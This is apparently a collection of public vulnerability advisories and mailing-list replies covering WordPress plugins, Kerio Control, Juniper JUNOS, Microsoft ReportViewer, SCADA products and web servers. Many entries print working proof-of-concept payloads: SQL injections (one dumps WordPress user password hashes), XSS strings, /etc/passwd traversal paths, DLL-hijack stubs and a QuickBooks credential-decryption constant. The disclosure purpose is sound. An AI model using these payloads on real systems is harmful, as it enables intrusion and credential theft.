[CVE-2019-12516] SlickQuiz for Wordpress 1.3.7.1 "/wp-admin/admin.php?page=slickquiz-*" Multiple Authenticated SQL Injections
RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION === Product:SlickQuiz Vendor URL: https://wordpress.org/plugins/slickquiz/ Type: SQL Injection [CWE-74] Date found: 2019-05-30 Date published: 2019-09-10 CVSSv3 Score: 8.1 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N) CVE:CVE-2019-12516 2. CREDITS == This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED SlickQuiz for Wordpress 1.3.7.1 (latest) 4. INTRODUCTION === SlickQuiz is a plugin for displaying and managing pretty, dynamic quizzes. It uses the SlickQuiz jQuery plugin. (from the vendor's homepage) 5. VULNERABILITY DETAILS The SlickQuiz Wordpress plugin is vulnerable to multiple authenticated SQL Injections whenever the "id" parameter is involved. It is not even required to have any quiz created, just the pure presence of the plugin makes the installation vulnerable. Since all access levels from Subscriber (the lowest possible rights) to Admin basically have access to the plugin, it is possible to escalate privileges quite easily. To name just a few vulnerable endpoints: /wp-admin/admin.php?page=slickquiz-scores=(select*from(select(sleep(5)))a) /wp-admin/admin.php?page=slickquiz-edit=(select*from(select(sleep(5)))a) /wp-admin/admin.php?page=slickquiz-preview=(select*from(select(sleep(5)))a) 6. RISK === The vulnerability can be used by an authenticated attacker (lowest possible rights of Subscriber are sufficient) to read sensitive contents from the backend database and therefore compromise all kinds of information, which is stored in the database. This could be sensitive authentication information like passwords or customer and employee information like email addresses and could also be used to escalate privileges to Admin which in return leads to RCE on the Wordpress installation via the plugin functionality. 7. SOLUTION === None (Remove the plugin) 8. REPORT TIMELINE == 2019-05-30: Discovery of the vulnerability during H1-4420 2019-06-01: CVE requested from MITRE 2019-06-02: MITRE assigns CVE-2019-12516 2019-06-10: Contacted vendor using their publicly listed email address 2019-06-19: Contacted vendor using their publicly listed email address 2019-06-22: Contacted vendor using their publicly listed email address 2019-08-28: No response from vendor 2019-09-10: Public disclosure. 9. REFERENCES = https://www.rcesecurity.com/2019/09/H1-4420-From-Quiz-to-Admin-Chaining-Two-0-Days-to-Compromise-an-Uber-Wordpress/
[CVE-2019-12517] SlickQuiz for Wordpress 1.3.7.1 "/wp-admin/admin.php?page=slickquiz" Multiple Stored XSS
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
===
Product:SlickQuiz
Vendor URL: https://wordpress.org/plugins/slickquiz/
Type: Cross-Site Scripting [CWE-79]
Date found: 2019-05-30
Date published: 2019-09-10
CVSSv3 Score: 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
CVE:CVE-2019-12517
2. CREDITS
==
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
SlickQuiz for Wordpress 1.3.7.1 (latest)
4. INTRODUCTION
===
SlickQuiz is a plugin for displaying and managing pretty, dynamic quizzes. It
uses the SlickQuiz jQuery plugin.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
The "save_quiz_score" functionality available to unauthenticated users via the
Wordpress "/wp-admin/admin-ajax.php" endpoint allows unauthenticated users to
submit quiz solutions/answers. If the configuration option "Save user scores"
is enabled (disabled by default), the response is stored in the database and
later shown in the Wordpress backend for all users with at least Subscriber
rights.
However, since the plugin does not properly validate and sanitize the quiz
response, a malicious XSS payload in either the name, the email or the score
parameter like:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0)
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 181
DNT: 1
Connection: close
action=save_quiz_score={"name":"Naalert(document.domain)
me","email":"info@localalert(document.domain)host",
"score":"alert(document.domain)","quiz_id":1}
is executed directly within the backend at "/wp-admin/admin.php?page=slickquiz"
across all users with the privileges of at least subscriber and up to admin.
6. RISK
===
To successfully exploit this vulnerability an authenticated user must be tricked
into visiting the SlickQuiz administrative backend on the affected Wordpress
installation.
The vulnerability can be used to permanently embed arbitrary script code into
the
administrative Wordpress backend, which offers a wide range of possible
attacks such as redirecting the user to a malicious page, spoofing content on
the
page or attacking the browser and its plugins.
7. SOLUTION
===
None (Remove the plugin)
8. REPORT TIMELINE
==
2019-05-30: Discovery of the vulnerability during H1-4420
2019-06-01: CVE requested from MITRE
2019-06-02: MITRE assigns CVE-2019-12517
2019-06-10: Contacted vendor using their publicly listed email address
2019-06-19: Contacted vendor using their publicly listed email address
2019-06-22: Contacted vendor using their publicly listed email address
2019-08-28: No response from vendor.
2019-09-10: Public disclosure.
9. REFERENCES
=
https://www.rcesecurity.com/2019/09/H1-4420-From-Quiz-to-Admin-Chaining-Two-0-Days-to-Compromise-an-Uber-Wordpress/
QuickBooks 2017 Admin Credentials Disclosure
+ Credits: Maxim Tomashevich
+ Website: https://www.thegrideon.com/quickbooks-forensics.html
+ Details: https://www.thegrideon.com/qb-internals-2017.html
Vendor:
-
www.intuit.com
www.intuit.ca
Product:
-
QuickBooks Desktop
versions: 2017
Vulnerability Type:
-
Admin Credentials Disclosure
Vulnerability Details:
-
Unattended access is the major security risk in QuickBooks Integrated
Applications infrastructure: it is necessary to store user credentials in order
to grant any application unattended access to the database content.
In QuickBooks version 2017 .SDU files are used to store Apps, access rights and
login details for QBW files. These .SDU files are stored in one location:
"C:\Users\\Intuit\QuickBooks\\.sdu".
In contrast to prior versions of QuickBooks 2017 .sdu files are easy to locate
and App named "ScheduledReports" is added to .QBW/.SDU records with full Admin
data access rights on every .QBW startup! This heavily worsens the situation
overall. As far as 2017 R4 update there is no way to permanently remove or
disable it.
.SDU file format is very simple:
DWORD dDataSize;
BYTE bEncryptedData[dDataSize];
Data is decrypted with Windows API CryptUnprotectData and 22 bytes constant
BYTE OptionalEntropy[22] = {0xA2, 0x48, 0x2E, 0x45, 0x12, 0x9B, 0xC7, 0xAB,
0xE2, 0xAB, 0xC6, 0x63, 0xCA, 0x76, 0xDD, 0xE0, 0x70, 0xB4, 0x84, 0x11, 0x6, 0};
Decrypted data contain two blocks:
180 bytes BASE64 encoded data digital signature.
and BASE64 encoded set of Apps records such as:
appname=ScheduledReports=0=07%2F05%2F2018=VeriSign%20Class%203%20Code%20Signing%202010%20CA=233AA6FE50417400BE428D60CF54264B=0=Intuit%2C%20Inc.;Admin;XX..XX
, where XX..XX is 21 bytes Admin Password Hash used as SQL Anywhere engine
password, base for sensitive data decryption, etc.
Thus in QuickBooks 2017 US or CA (upto R4 so far) database "Admin" level
credentials are available by default to anybody with current Windows login
details for all QBW files created.
Due to fixed location used to store .sdu files they can also be used to collect
login credentials for remote access to QB database with a simplest malicious
script/code.
Severity Level:
-
High
Disclaimer:
-
Permission is hereby granted for the redistribution of this text, provided that
it is not altered except by reformatting, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author. The author is not
responsible for any misuse of the information contained herein and prohibits
any malicious use of all security related information or exploits by the author
or elsewhere.
Logic security flaw in TP-LINK - tplinklogin.net
TP-LINK forgot to buy the domain www.tplinklogin.net which is beings used to configure many of the hardwares they have, like routers configuration. The domain is available to buy via escort service, so potential attacker can get it, it's all about money. There is unknown holder who have the domain right now, and has been confirmed to be out of the company. As for now, the company decided to make minor fixes. Yet - they don't like to buy the domain from the unknown seller, for now. I've contacted the Chinese CERT, the US-CERT the Israeli CERT and the company. The logic behind using domain in the first time, instead of IP address is the main problem here, forgetting to buy the domain is the second mistake. While checking how many users are trying to use it, I've realized that's this is effecting plenty of people. My advice is to block the domain by the ISP. It seems that's some people understood that's the service is not good, and complained about it online, however I didn't saw a publication concern the security effect of the issue I hope this mistake won't happened again Amitay Dan CEO at Cybermoon for more info please follow www.cybermoon.cc www.amitaydan.com @popshark1
[Call For Papers] RiseCON - Rosario, Argentina
RiseCON - Rosario Information Security Conference 2014 www.risecon.org Fechas: 6 y 7 de noviembre de 2014 Locación: Plataforma Lavarden (Av Mendoza 1085) - Rosario, Santa Fe, Argentina RiseCON es el primer y mayor evento de seguridad informática y hacking realizado en la ciudad de Rosario, con nivel y trascendencia internacional. Para la 1º edición de RiseCON convocamos a todos aquellos que se encuentren interesados en exponer sus investigaciones, trabajos y/o desarrollos en el campo de la seguridad informática. Las charlas podrán enviarse hasta del 15 de Septiembre (inclusive) a c...@risecon.org, adjuntando en un documento la siguiente información: - Título de la Presentación - Autor - Duración estimada (máximo de 45 minutos) - Temática - Resumen de la charla (máximo 3000 palabras) - ¿Incluye demo en vivo? - ¿Presentará alguna nueva herramienta? - ¿Presentará algún nuevo exploit? - ¿La charla ha sido presentada anteriormente en alguna otra conferencia? - Teléfono de contacto (Fijo y Celular) Los temas de interés (pero no limitados) para charlas, trainings (arancelados) y workshops (gratuitos) son los siguientes: - Cloud Security - Honeypots/Honeynets - Forensics Anti-Forensics - Network Devices and Router Hacking - Bitcoin Security - Software Testing/Fuzzing - Seguridad en WLAN / Bluetooth VoIP - RFiD, Bluetooth and NFC - Social Engineering / “Layer 8” - Hacking de entornos virtualizados - Lockpicking Physical Security - Open Source Security Hacking Tools - Web Application Security Hacking - Malware Analysis Reverse Engineering - Nuevas Vulnerabilidades / Exploits/0-days - Advanced Penetration Testing Techniques - Antivirus/Firewall/UTM Evasion Techniques - Electronics Micro Controllers - Similar Arduino's, ARM, RaspberryPi - Cibercrimen - Mobile Application Security-Threats and Exploits - Mobile Communications (GPRS/GSM/3G/4G/HSDPA etc) - Critical Infrastructure SCADA Networks Security * Tendrán prioridad aquellas exposiciones que incluyan demos en vivo. - Fechas importantes - - 15 de Septiembre - Cierre de recepción de papers - 6 de Noviembre - RiseCON Trainings arancelados y Workshops gratuitos - 7 de Noviembre - RiseCON Charlas (Entrada Libre y Gratuita)
Kerio Control = 8.3.1 Boolean-based blind SQL Injection
Document Title:
==
Kerio Control = 8.3.1 Boolean-based blind SQL Injection
Primary Informations:
==
Product Name: Kerio Control
Software Description: Kerio Control brings together multiple capabilities
including a network firewall and router, intrusion detection and
prevention (IPS), gateway anti-virus, VPN and content filtering. These
comprehensive capabilities and unmatched deployment flexibility make
Kerio Control the ideal choice for small and mid-sized businesses.
Affected Version: Latest Version - 8.3.1 (released on 2014-05-20)
Vendor Website: http://kerio.com
Vulnerability Type: Boolean-based blind SQL Injection
Severity Level: Very High
Exploitation Technique: Remote
CVE-ID: CVE-2014-3857
Discovered By: Khashayar Fereidani
Main Reference:
http://fereidani.com/articles/show/76_kerio_control_8_3_1_boolean_based_blind_sql_injection
Researcher's Websites: http://fereidani.com http://fereidani.ir
http://und3rfl0w.com http://ircrash.com
Researcher's Email: info [ a t ] fereidani [ d o t ] com
Technical Details:
===
Kerio Control suffers from a SQL Injection Vulnerability which can lead to gain
users
sensitive informations like passwords , to use this vulnerability attacker
need a
valid client username and password .
Vulnerable path: /print.php
Vulnerable variables: x_16 and x_17
HTTP Method: GET
Proof Of Concept:
===
Blind Test:
TRUE: https://[SERVER
IP]:4081/print.php?x_w=overallx_14=L1x_15=statsx_16=16221 AND
1=1x_17=16221x_18=-1x_1b=x_1a=x_1l=[ VALID
SESSION]x_3k={%27x_fj%27%3A16220%2C+%27x_fk%27%3A+16220}x_3l={%27x_fj%27%3A16222%2C+%27x_fk%27%3A+16222}x_1c=x_1e=-270x_1f=-1x_3m=0x_11=overallx_12=individualx_13=x_2l
FALSE: https://[SERVER
IP]:4081/print.php?x_w=overallx_14=L1x_15=statsx_16=16221 AND
1=2x_17=16221x_18=-1x_1b=x_1a=x_1l=[ VALID
SESSION]x_3k={%27x_fj%27%3A16220%2C+%27x_fk%27%3A+16220}x_3l={%27x_fj%27%3A16222%2C+%27x_fk%27%3A+16222}x_1c=x_1e=-270x_1f=-1x_3m=0x_11=overallx_12=individualx_13=x_2l
Solution:
Valid escaping variables or type checking for integer
Exploit:
Private
Vulnerability Disclosure Timeline:
==
May 30 2014 - Disclosure
May 31 2014 - Received a CVE ID
May 31 2014 - Initial Report to Kerio Security Team
June 3 2014 - Support team replied fix is planned to be included in a future
release
June 30 2014 - Patched
July 1 2014 - Publication
Khashayar Fereidani -
http://fereidani.com
Wordpress Booking System (Booking Calendar) plugin SQL Injection
# Exploit Title: Wordpress Booking System (Booking Calendar) plugin SQL Injection # Release Date: 2014-05-21 # Author: maodun # Contact: Twitter: @conmancm # Software Link: http://wordpress.org/support/plugin/booking-system # Affected version: 1.3 # Google Dork: inurl:/wp-content/plugins/booking-system/ # REF:CVE-2014-3210 - # Introduction: Booking System is great for booking hotel rooms, apartments, houses, villas, rooms etc, make appointments to doctors, dentists, lawyers, beauty salons, spas, massage therapists etc or schedule events. - # SQLi - Proof Of Concept: vulnerable path: /wp-content/plugins/booking-system/dopbs-backend-forms.php vulnerabile parameter:$_POST['booking_form_id'] POC: POST /wp/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 149 Cookie: [your cookie] action=dopbs_show_booking_form_fieldsbooking_form_id=100 union select 1,2,3,4,5,6,7,8,9,hex(concat(user_login,user_pass)) from wp_users#language=cr response: input type=hidden name=booking-form-field-translation-1 id=booking-form-field-translation-1 value=[hex value here] / - # Patch: -- Vendor was notified on the 2014-05-05 -- Vendor released version 1.3 on 2014-05-06 Fixed the bug -
XSS on Juniper JUNOS 11.4 Embedthis Appweb 3.2.3
Vulnerability Type: (XSS) Cross-Site Scripting - Original release date: November 11th, 2013 - Last revised: November 11th, 2013 - Discovered by: Andrea Bodei - A2SECURE - Severity: 4.3/10 (CVSSv2 Base Scored) Products and affected versions: JUNOS up to 11.4 (probably 12.1 and 12.3 vulnerable) Vulnerability Discovered by: Andrea Bodei - i...@andreabodei.com Company: A2SECURE - España A2Secure Website: http://www.A2secure.com Vendor Website: http://www.juniper.net Application Website: http://freecode.com/projects/appweb == Background == Juniper Networks, Inc. is an American manufacturer of networking equipment founded in 1996 by Mark Burke. It is headquartered in Sunnyvale, California, USA. The company designs and sells high-performance Internet Protocol network products and services. Juniper's main products include T-series, M-series, E-series, MX-series, and J-series families of routers, EX-series Ethernet switches and SRX-series security products. Junos, Juniper's own network operating system, runs on most Juniper products. == Vulnerability Details == JUNOS versions 11.4, 12.1 can be managed by a web login on HTTPS port 443 through EmbedThis AppWeb Webserver 3.2.3 that is prone to (XSS) Cross Site Vulnerability in the index.php error parameter due to insufficient sanitising of special characters that allows to execute arbitrary scripts in the context of the user's browser. This vulnerability could be exploited to manipulate a client session, steal tokens, steal credentials, execute administrative task, impersonate a legitimate user, perform transactions as that user or for phishing. Juniper should try to upgrade it's OS with latest release of EmbedThis 4.4.1 or better and implement a special characters filtering == Proof Of Concepts == This URLs just pop up a custom number/lecter/word/phrase: https://xxx.xxx.xxx.xxx/index.php?name=Your_Accounterror=1%22%3E%3Cscript%3Ealert%281538%29%3C%2Fscript%3Euname=bGF https://xxx.xxx.xxx.xxx/index.php?name=Your_Accounterror=1%22%3E%3Cscript%3Ealert%28HACKED%29%3C%2Fscript%3Euname=bGF == Credits/Author == Andrea Bodei A2Secure.com == Disclaimer == All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage. Therefore A2Secure shall not be liable for any direct or indirect damages that might be caused by using this information.
AthCon 2013 Rev. Challenge 2013
The Reverse Engineering challenge is now available. The rules are included in the associated zip file. All submissions should be sent to kyre...@athcon.org and the deadline is 30/04/2013. Download Rev. Challenge 2013:http://www.athcon.org/AthCon_2013_RE_Challenge.zip Challenge Creator: Kyriakos Economou Nikolaos Tsapakis
Re: Ilient SysAid v8.5.05 - Multiple Web Vulnerabilities Are Fixed!
Thanks for the feedback! All of SysAid's web vulnerabilities are fixed. SysAid has already come out with a new release 8.5.08 that addresses all of these security issuesmaking SysAid 8.5.08 highly secure. We are sorry for the inconvenience, and encourage all our users to upgrade to the most recent version of SysAid here: http://www.ilient.com/release-upgrades.htm.
Cross-Site Scripting (XSS) in Microsoft ReportViewer Controls
==
Cross-Site Scripting (XSS) in Microsoft ReportViewer Controls
Adam Bixby - Gotham Digital Science (l...@gdssecurity.com)
Public Release Date: 8/9/2011
Confirmed Affected Software: Microsoft Report Viewer Redistributable 2005 SP1
and Microsoft Visual Studio 2005 Service Pack 1
Browser used for testing: IE8 (8.0.7601.17514)
Severity: High
MS Bulletin: MS11-067 -
http://www.microsoft.com/technet/security/Bulletin/MS11-067.mspx
CVE: CVE-2011-1976
==
1. Summary
==
The Microsoft ReportViewer Controls are a freely redistributable control that
enables embedding reports in applications developed using the .NET Framework.
A Cross-Site Scripting (XSS) vulnerability was found in the
Microsoft.ReportViewer.WebForms.dll. The XSS vulnerability appears to affect
all websites that utilize the affected controls.
==
2. Technical Details
==
File: Microsoft.ReportViewer.WebForms.dll (PerformOperation() method of the
SessionKeepAliveOperation class)
1) User controllable data enters via the TimerMethod URL parameter value and
is assigned to the andEnsureParam string variable.
string andEnsureParam = HandlerOperation.GetAndEnsureParam(urlQuery,
TimerMethod);
2) The andEnsureParam variable with user-controllable input is then passed
into the s string variable which is dynamically building a javascript block.
The s variable is then passed to response.write(). Writing the un-validated
data to the JS block creates the XSS exposure.
string s = string.Format(CultureInfo.InvariantCulture,
lt;htmlgt;lt;bodygt;lt;script
type=\text/javascript\gt;parent.{0}();lt;/scriptgt;lt;/bodygt;lt;/htmlgt;,
new object[] { andEnsureParam });
response.Write(s);
==
3. Proof-of-Concept Exploit
==
This vulnerability can be exploited against websites that have deployed the
vulnerable Microsoft.ReportViewer.WebForms.dll. You will note that since the
data is being written into an existing Javascript block that the attacker does
not need to include any opening or closing tags (i.e.,img, script, etc) to
execute code.
Reproduction Request:
https://test.com/Reserved.ReportViewerWebControl.axd?Mode=trueReportID=lt;arbitraryIDvaluegt;ControlID=lt;validControlIDgt;Culture=1033UICulture=1033ReportStack=1OpType=SessionKeepAliveTimerMethod=KeepAliveMethodctl00_PlaceHolderMain_SiteTopUsersByHits_ctl00TouchSession0;alert(document.cookie);//CacheSeed=
(Note: During testing of this issue, it appeard as though a valid ControlID
parameter value was needed to exploit this issue)
==
4. Recommendation
==
Update to the latest versions. For more information please see
http://www.microsoft.com/technet/security/Bulletin/MS11-067.mspx
==
5. About Gotham Digital Science
==
Gotham Digital Science (GDS) is an information security consulting firm that
works with clients to identify, prevent, and manage security risks. For more
information on GDS, please contact i...@gdssecurity.com or visit
http://www.gdssecurity.com.
myBloggie 2.1.6 SQL-Injection, Advanced INSERT INTO Injection technique
myBloggie 2.1.6 SQL-Injection, Advanced INSERT INTO Injection technique
Software: myBloggie 2.1.6
Severity: High
Author: Robin Verton info (at) robinverton (dot) de
Date: Jun. 12 2011
Vendor: http://mybloggie.mywebland.com/
Software Description:
myBloggie is considered one of the most simple, user-friendliest yet packed
with features Weblog system available to date.
Issue details:
myBloggie 2.1.6 is - again - prone to a SQL-Injection vulnerability in the
trackback function. It is possible to add a malformed URL to a trackback so
malicious code can be injected to insert/read out data from the database.
An unsafe regular expression which does not properly check the passed
trackback-url can be bypassed to inject malicious data into an INSERT INTO
statement, resulting in an persistent cross-site-scripting or be used for
reading out sensitive data (see 'Advanced INSERT INTO exploitation by taking
advantage of the primary key' described here [1]).
Technical details:
trackback.php - Line 33-35
$url=urldecode($_REQUEST['url']);
if (validate_url($url)==false) { $tback-trackback_reply(1, pSorry,
Trackback failed.. Reason : URL not valid/p); }
function.php - Line 750-755
function validate_url($url) {
if ( ! preg_match('#^http\\:\\/\\/[a-z0-9\-]+\.([a-z0-9\-]+\.)?[a-z]+#i',
$url, $matches) ) {
return false ;}
else {
return true; }
}
As you can see the end of the passed $url in the regular expression is not
defined. By providing an URL like http://example.com'INJECTION the filter can
be bypassed.
Timeline:
12. July 2011 - Bug found.
12. July 2011 - Vendor contacted.
15. July 2011 - Full disclosure.
References:
[0] Original advisory:
http://robinverton.de/blog/mybloggie-2-1-6-sql-injection-persistent-xss
[1]
http://robinverton.de/blog/advanced-insert-into-injection-by-taking-advantage-of-the-primary-key
Re: Chamilo 1.8.7 / Dokeos 1.8.6 Remote File Disclosure
Dokeos 1.8.6.2 fixes these 2 security holes. Dokeos 1.8.6.2 has been released one day after we got informed about this security release. Download @sourceforge http://bit.ly/dYOvDc
Microsoft IIS 6 parsing directory �x.asp� Vulnerability
# Microsoft IIS 6 parsing directory Vulnerability #Discovered by: Pouya daneshmand whh_iran[AT]yahoo[DOT]com http://securitylab.ir/blog #Introduction: Using this vulnerability you can bypass some Security filters, for example a file with .jpg or .rar extension can be executed as an asp (Active Server Page) file. #Vulnerable: It just works for asp files and works on Windows 2003 / IIS 6 (As I tested...). The test failed on IIS 5.1 and IIS 7. #Description: 1) Create a Folder with '.asp' extension. 2) Insert your ASP code in a file with any extension (like .jpg,.rar,.txt) in the folder you have created. 3) Open the file with your browser and you will see it's executed as an asp file! #Note: The Extension of file does not matter at all! #Solution: There is no patch to fix this security vulnerability yet, the best thing I can say is to DISABLE ASP FILES FROM YOUR web server extensions! Or Remove execute permission from the upload directories. #PS: This vulnerability was reported for first time at 2010-06-19 in Persian (http://sebug.net/vulndb/19820/) #Original Advisory: http://securitylab.ir/blog/dl/Microsoft-IIS6-parsing-directory-Vulnerability.pdf http://securitylab.ir/blog/posts/11/Microsoft-IIS-6-parsing-directory-%E2%80%9Cx.asp%E2%80%9D-Vulnerability/
Sigma Portal Denial of Service Vulnerability
# # Securitylab.ir # # Application Info: # Name: Sigma Portal # Vendor: http://www.sigma.ir # # Vulnerability Info: # Type: Denial of Service # Risk: Medium # 2010-08-11 - Vendor notified # Vulnerability: http://site.ir/Portal/Picture/ShowObjectPicture.aspx?Width=%2791Height=1099000-=ObjectType=NewsObjectID=(Picture ID) With setting of large values of width and height it's possible to create large load at the server. # # Discoverd By: Pouya Daneshmand # Website: http://Securitylab.ir # Contacts: info[at]securitylab.ir whh_iran[at]yahoo.com ###
Asan Portal (IdehPardaz) Multiple Vulnerabilities
# # Securitylab.ir # # Application Info: # Name: Asan Portal # Vendor: http://iptech.ir/default.aspx?id=130 # Vulnerability: ## # Denial of Service: ## http://site.ir/Modules/Administrative/ShowPhotos/ShowImages.aspx?id=922FieldName=Content_Image1w=1000h=1000 With setting of large values of width and height it's possible to create large load at the server. ## # SQL Injection: ## http://site.ir//Modules/Administrative/ShowPhotos/ShowImages.aspx?FieldName=Content_Image1h=75id=%24[SQL Injection]w=75 # # Discoverd By: Securitylab.ir # Website: http://Securitylab.ir # Contacts: info[at]securitylab.ir ###
Mozilla Firefox 3.6.12 Denial of Service Vulnerability
PoC:
body onload=location='';alert('DoS');
By: Pouya Daneshmand
Advisory:
http://securitylab.ir/Advisories/Firefox%203.6.12%20Denial%20of%20Service%20Vulnerability.txt
[STANKOINFORMZASCHITA-10-02] ITS SCADA Authorization bypass
[STANKOINFORMZASCHITA-10-02] ITS SCADA Authorization bypass Authors: Eugene Salov (eug...@itdefence.ru), Andrej Komarov (koma...@itdefence.ru) Product: ITS SCADA CVSS v2 Base Score: 9.0 (AV:N/AC:L/Au:R/C:C/I:C/A:C) Impact Subscore: 10.0 Exploitability Subscore: 8.0 Availability of exploit: Yes Product description: ITS SCADA is Supervisory Control And Data Acquisition system (SCADA), which can be interfaces with various heterogeneous industrial automation equipment of Motorola MOSCAD family. Additionally, it can be installed with elements of Wonderware company products environment (Industrial SQL Server, MODBUS I/O Server). URL: http://www.itsdemo.com Vulnerability description: An unauthorized access of database fields data can be done with help of SQL-injection exploitation. Moreover, it can helps attacker to bypass authorization without any password validation. Database structure: «RTUinfo»: SiteNum, SiteType, Description; «Alarms»: EventStamp, AlarmState, TagName, Description, Operator, Provider, EventStampUTC; «BWMInfo»: RTU, SalesLocation, Description, Type, Summ; «dtproperties»: id, objectid, property, value, uvalue, version; «FlowData»: Site, iDate, DateTime, Rate, Peak, Average, Total, Lvl; «sysconstraints»: constid, id, colid, spare1, status, actions, error; «syssegments»: segment, name, status; «Users»: UID, Password, AccessLevel. Given elements of database structure contain various information about connected telemetric devices, users, occurred refusals and alarms, execution course of technological process performance. Exploitation method: User ID = 1' or 1=(select top 1 password from Users)-- Password = blank Solution: There is no available security update for now. It is highly recommended not to use default passwords for user authorization. Moreover, additionally you can use ACL lists for allowing access only from trusted hosts. Another additional mesaure of safety is using of Web Application Firewalls (WAF) and IPS/IDS systems in the area where SCADA system is located. About STC «STANKOINFORMZASCHITA»: Science Technology Center (STC) «STANKOINFORMZACHITA» is the leading information security company in Russian Federation in sphere of automation and industrial security, providing information security consulting services, information security audit, penetration testing of SCADA and industrial control systems. Contact: info (at) itdefence (dot) ru Russia, Moscow, Bolshaya Bochtovaya st., 26, Business Center Tel.: +7 (495) 790-16-60 http://itdefence.ru
[STANKOINFORMZASCHITA-10-01] Netbiter� webSCADA multiple vulnerabilities
[STANKOINFORMZASCHITA-10-01] Netbiter® webSCADA multiple vulnerabilities Authors: Eugene Salov (eug...@itdefence.ru), Andrej Komarov (koma...@itdefence.ru) Product: Netbiter® webSCADA CVSS v2 Base Score: 9.0 (AV:N/AC:L/Au:R/C:C/I:C/A:C) Impact Subscore: 10.0 Exploitability Subscore: 8.0 Availability of exploit: Yes Product description: Netbiter® webSCADA (WS100/WS200) is one of polular products in industrial automation, allowing to organize remote access to field devices based on MODBUS TCP through Ethernet, GSM, GPRS channels. The Netbiter is equipped with both Ethernet and a built-in GSM/GPRS modem for communication to remote equipment. This means that it can both communicate over an Ethernet LAN and wireless using the built-in modem. In addition it also supports an external GPS receiver to keep track of its geographical position. Netbiter solution had embedded WEB-server and HMI, which provides management functions by operations on detection of alarms and emergencies with the subsequent notification by SMS, E-mail, SNMP protocol. URL: Intellicom Innovation AB (http://www.intellicom.se) Vulnerability description: 1. Local File Disclosure (WASC Web Application Threat Classification): /cgi-bin/read.cgi?page=../../../../../../../../../../../etc/passwd%00 2. Users information disclosure: /cgi-bin/read.cgi?file=/home/config/users.cfg 3. An opportunity of malware code uploading by injection of special crafted GIF-image on the logo page modifying: /cgi-bin/read.cgi?page=config.htmlfile=/home/config/pages/2.confsection=PAGE2 In the context of GIF-image can be hidden special malware code («Web-shell»), which will be used for SCADA server management and unauthorized OS commands execution. Solution: There is no available security update for now. It is highly recommended not to use default passwords for user authorization. Moreover, additionally you can use ACL lists for allowing access only from trusted hosts. Another additional mesaure of safety is using of Web Application Firewalls (WAF) and IPS/IDS systems in the area where SCADA system is located. About STC «STANKOINFORMZACHITA»: Science Technology Center (STC) «STANKOINFORMZACHITA» is the leading russian information security company in sphere of automation and industrial security, providing information security consulting services, information security audit, penetration tesing of SCADA and industrial control systems. Contact: i...@itdefence.ru Russia, Moscow, Bolshaya Bochtovaya st., 26, Business Center Tel.: +7 (495) 790-16-60 http://itdefence.ru
Microsoft Windows wscript.exe (XP) DLL Hijacking Exploit (wshfra.dll)
=
Founded By: Kamran Safaei Tabrizi(k4mr4n_st(at)yahoo(dot)com)
Securitylab Security Research Team
Website: http://www.securitylab.ir
Special Thanks: Mazo shinozuki, BangoDragon
=
#include stdafx.h
void init() {
MessageBox(NULL,Mazo!, k4mr4n!,0x0003);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
=
Flash Player 9 DLL Hijacking Exploit (schannel.dll)
===
Flash player 9.exe DLL Hijacking Exploit (schannel.dll)
===
Founded By: Securitylab.ir (Kamran Safaei Tabrizi)
===
include stdafx.h
void init() {
MessageBox(NULL,Ops, OpS!,0x0003);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
=
IE6 css set Denial of Service Vulnerability
Published by Securitylab.ir
Founder: unknown
style type=text/css
! -
The question is which set the css style of the time wrong.
css definition is f: expression (this.src = 'about: blank', this.outerHTML ='');
In question should be is mshtml.dll -
/*![ CDATA [*/
iframe{
f: expression(this.src='about:blank',this.outerHTML='');
}
# F126 (v: expression ()! Important)
/*]]*/
/ Style
iframe id=f126 src=test
Original Advisory:
http://securitylab.ir/other/IE-1.txt
Cherokee Web Server 0.5.3 Multiple Vulnerabilities
# # Securitylab.ir # # Application Info: # Name: Cherokee Web Server # Version: 0.5.3 # Download: http://mirror.aarnet.edu.au/pub/cherokee/windows/Cherokee-setup-0.5.3.exe # [Directory Traversal]: http://127.0.0.1/%5C../%5C../%5C../boot.ini%20 [Remote Source Disclosure]: http://127.0.0.1:80/file.html::$DATA http://127.0.0.1/index.htm%20 # # Discoverd By: Pouya Daneshmand # Website: http://Pouya.info # Contacts: info[at]securitylab.ir i...@pouya[dot]info ###
Re: RE: Nginx 0.8.35 Space Character Remote Source Disclosure
Vul in stable versions now isn't work. Original Advisory: http://blog.pouya.info/userfiles/vul/NginX.rar
Nginx 0.8.35 Space Character Remote Source Disclosure
# # Securitylab.ir # # Application Info: # Name: Nginx # Tested on nginx 0.8.35 # Nginx 0.8.36 and higher is not vulnerable # # Vulnerability Info: # Type: Remote File Disclosure # Risk: High # # Vulnerability: # http://localhost/file.php%20 # # Discoverd By: Pouya Daneshmand # Website: http://Pouya.Securitylab.ir # Contacts: whh_iran[at]securitylab.ir i...@securitylab[dot]ir ###
